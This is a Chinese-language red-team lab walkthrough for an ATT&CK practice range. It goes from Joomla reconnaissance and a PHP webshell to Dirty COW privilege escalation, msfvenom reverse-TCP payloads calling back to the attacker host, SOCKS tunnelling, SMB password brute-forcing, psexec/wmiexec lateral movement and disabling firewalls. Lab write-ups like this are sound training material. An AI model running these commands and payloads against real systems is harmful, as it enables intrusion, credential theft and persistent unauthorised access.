ATT&CK红队评估(红日靶场三)渗透测试教学文档

靶场环境搭建

网络拓扑

• 出网主机：CentOS（双网卡）
  • 出网网卡：NAT模式，网段192.168.48.0/24
  • 内网网卡：VMnet2模式，网段192.168.93.0/24
• 攻击机：Kali Linux（NAT模式）
• 其他主机：默认VMnet2模式

配置步骤

1. 创建VMnet2虚拟网络（仅主机模式，子网192.168.93.0）
2. 启动CentOS并执行service network restart获取IP
3. 确认Kali能ping通CentOS出网IP（192.168.48.134）

信息收集

主机发现

nmap -sP -T4 192.168.48.0/24

发现存活主机192.168.48.134（靶机）

端口扫描

nmap -sS -p 1-65535 -A 192.168.48.134

开放服务：

• 22/tcp SSH
• 80/tcp HTTP (Joomla CMS)
• 3306/tcp MySQL

Web应用渗透

Joomla扫描

joomscan --url http://192.168.48.134/

发现：

• 后台地址：/administrator/index.php
• 敏感配置文件泄露数据库凭据

数据库利用

1. 使用Navicat连接MySQL（使用泄露的凭据）
2. 通过SQL添加管理员账户：

INSERT INTO am2zu_users(name, username, password, params, registerDate, lastvisitDate, lastResetTime)
VALUES ('Administrator2', 'admin123','433903e0a9d6a712e00251e44d29bf87:UJ0b9J5fufL3FKfCc0TLsYJBh2PFULvT', '', NOW(), NOW(), NOW());

INSERT INTO am2zu_user_usergroup_map (user_id,group_id)
VALUES (LAST_INSERT_ID(),'8');

获取WebShell

1. 通过Joomla后台上传PHP一句话木马
2. 使用蚁剑连接，发现disable_functions限制
3. 使用蚁剑插件绕过（PHP7_GC_UAF模式）

权限提升

系统识别

• 获取的shell实际上是Ubuntu（web1）系统
• 在/tmp/mysql/test.txt发现SSH凭据：wwwuser/wwwuser_123Aqx

SSH登录

ssh wwwuser@192.168.48.134

Linux提权（脏牛漏洞）

1. 上传dirty.c exploit
2. 编译并执行：

gcc -pthread dirty.c -o dirty -lcrypt
./dirty 123456
su firefart

3. 成功获取root权限

持久化

1. 生成Linux Meterpreter payload：

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.48.136 LPORT=4445 -f elf > a.elf

2. 设置监听：

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.48.136
set LPORT 4445
exploit

内网渗透

网络探测

1. 添加路由：

route add 192.168.93.0 255.255.255.0 1

2. 建立SOCKS5代理（使用EarthWorm）：

# Kali执行：
./ew_for_linux64 -s rcsocks -l 1080 -e 1234

# CentOS执行：
./ew_for_linux64 -s rssocks -d 192.168.48.136 -e 1234

3. 配置proxychains：

vim /etc/proxychains4.conf

内网主机发现

proxychains4 nmap -sP -T4 192.168.93.0/24

发现主机：

• 192.168.93.10 (WIN-8GA56TNV3MV)
• 192.168.93.20 (WIN2008)
• 192.168.93.30 (WIN7)
• 192.168.93.100 (CentOS)
• 192.168.93.120 (Ubuntu)

横向移动

密码爆破

1. 使用hydra爆破SMB：

hydra -l administrator -P /root/fuzzDicts/passwordDict/top500.txt smb://192.168.93.30

获取凭据：

• XP/WIN2008: administrator/123qwe!ASD
• WIN2012: administrator/zxcASDqw123!!

攻击Windows主机

1. 使用psexec：

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set SMBUser administrator
set SMBPass 123qwe!ASD
set RHOSTS 192.168.93.30
exploit

2. 使用wmiexec：

python wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'

远程桌面利用

1. 开启RDP：

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes

2. 上传payload：

msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.48.136 LPORT=5555 -f exe > shell1.exe

IPC共享利用

net use \\192.168.93.20\ipc$ "zxcASDqw123!!" /user:TEST.ORG\Administrator
copy shell2.exe \\192.168.93.10\C$\

后渗透

权限维持

1. 关闭防火墙：

NetSh Advfirewall set allprofiles state off

2. 进程迁移：

migrate <PID>

提权

getsystem

关键点总结

1. 敏感信息泄露是常见突破口（配置文件、数据库凭据）
2. 密码复用现象普遍（内网多台主机使用相同密码）
3. 多种横向移动技术组合使用（SMB、WMI、RDP、IPC）
4. 代理技术是内网渗透的关键（EarthWorm + proxychains）
5. 权限提升需要根据目标系统选择合适方法（脏牛、getsystem）